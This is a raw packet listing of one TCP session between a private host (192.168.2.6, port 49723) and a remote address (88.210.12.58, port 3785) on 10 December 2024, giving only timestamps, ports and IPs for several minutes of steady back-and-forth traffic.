Dec 10, 2024 08:58:45.155458927 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.234967947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.253624916 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.335975885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.354372025 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.438746929 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.455363989 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.536979914 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.558240891 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.637986898 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.656347990 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.738003016 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.757460117 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.839042902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.857321024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.940006971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.959116936 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.044662952 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.059389114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.145015001 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.163995981 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.245003939 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.264394999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.345993042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.364626884 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.445985079 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.465411901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.547034025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.565413952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.648010969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.666896105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.747983932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.767258883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.852698088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.867269993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:46.952029943 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:46.972137928 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.050697088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.071474075 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.152702093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.235909939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.251003027 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.351063967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.451067924 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.470525980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.470565081 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.471210957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.551682949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.570734024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.656714916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.671046019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.752707005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.776102066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.851995945 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.872051001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:47.953107119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:47.971801996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:48.052998066 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:48.072542906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:48.154056072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:48.172286034 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:48.273447037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:48.861957073 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:48.962486982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:48.981303930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.063379049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.082036018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.163077116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.182826042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.264707088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.282630920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.364701033 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.384069920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.466713905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.484045029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.566730022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.586014032 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.666717052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.686125994 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.766741037 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.785921097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.863979101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.886092901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:49.965006113 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:49.983283997 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.064997911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.084211111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.166013002 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.184407949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.266031981 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.285371065 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.365976095 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.385250092 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.467017889 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.485275984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.568016052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.586323023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.668997049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.687585115 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.770056009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.788505077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.870982885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.889631033 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:50.972744942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:50.990334988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.071979046 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.092113972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.172699928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.191308975 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.292212963 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.328865051 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.447338104 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.448260069 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.566809893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.756709099 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.853082895 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.876015902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:51.954009056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:51.972418070 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.054096937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.073470116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.154989958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.173496962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.255978107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.274257898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.356014967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.375320911 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.455982924 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.475591898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.555993080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.575633049 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.656991005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.675498009 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.757994890 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.776423931 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.862757921 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.877465010 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:52.963180065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:52.982264042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.060978889 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.083239079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.162867069 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.181312084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.263011932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.282207966 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.363995075 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.383626938 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.464711905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.483325958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.564987898 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.584054947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.666870117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.684494972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.764987946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.786133051 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.864983082 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.884397984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:53.965009928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:53.984342098 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.066047907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.084336996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.167097092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.185350895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.268014908 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.286545992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.368139029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.387439966 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.468132019 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.487548113 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.569001913 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.588211060 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.670006037 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.688256025 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.770005941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.789745092 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.871876955 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.889290094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:54.971642017 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:54.991538048 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.072717905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.091049910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.176565886 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.193926096 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.274787903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.296014071 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.373991013 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.394185066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.474756956 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.493319035 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.574975014 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.594029903 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.674972057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.694363117 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.776707888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.794384003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.876147985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.896404028 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:55.977041960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:55.995428085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:56.096513033 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:56.299114943 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:56.418575048 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:56.546129942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:56.657285929 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:56.665472031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:56.757983923 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:56.776699066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:56.858537912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:56.877324104 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:56.958749056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:56.977852106 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.057991028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.078501940 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.158793926 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.177314043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.258980989 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.278109074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.359038115 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.378295898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.463720083 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.478276968 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.562824965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.583089113 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.662780046 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.682323933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.762795925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.782326937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.862006903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.882237911 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:57.963021040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:57.981328964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.064009905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.082278967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.164098024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.183450937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.264034033 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.283488989 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.364996910 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.383300066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.466042042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.484396935 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.565973043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.585257053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.667048931 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.685349941 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.767199039 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:58.786444902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:58.886564970 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.090548992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.194408894 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.209959030 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.296710968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.313755989 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.413954973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.416232109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.517208099 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.533401966 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.617072105 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.636667013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.717035055 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.736449003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.819761038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.836474895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:59.918068886 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:59.939156055 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.018996000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.037571907 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.119081974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.138402939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.220021963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.238444090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.320993900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.339425087 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.421015978 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.440507889 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.521004915 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.540851116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.621001005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.640340090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.721013069 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.740576982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.822084904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.841027021 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:00.924714088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:00.941447020 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.023993015 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.044105053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.124725103 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.143951893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.228720903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.244231939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.328723907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.348086119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.424984932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.448164940 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.525006056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.544663906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.628710032 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.644521952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.728040934 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.748128891 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.828715086 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.847378969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:01.931051016 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:01.948430061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.032103062 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.050374031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.133034945 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.151627064 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.233023882 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.252398014 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.334122896 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.352231979 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.435101986 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.453416109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.535007000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.554502964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.635006905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.654230118 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.735016108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.755002022 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.836060047 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.854255915 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:02.936003923 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:02.955351114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.037029028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.055318117 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.136993885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.156260967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.238013029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.256216049 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.339010954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.357574940 CET	3785	49723	88.210.12.58	192.168.2.6
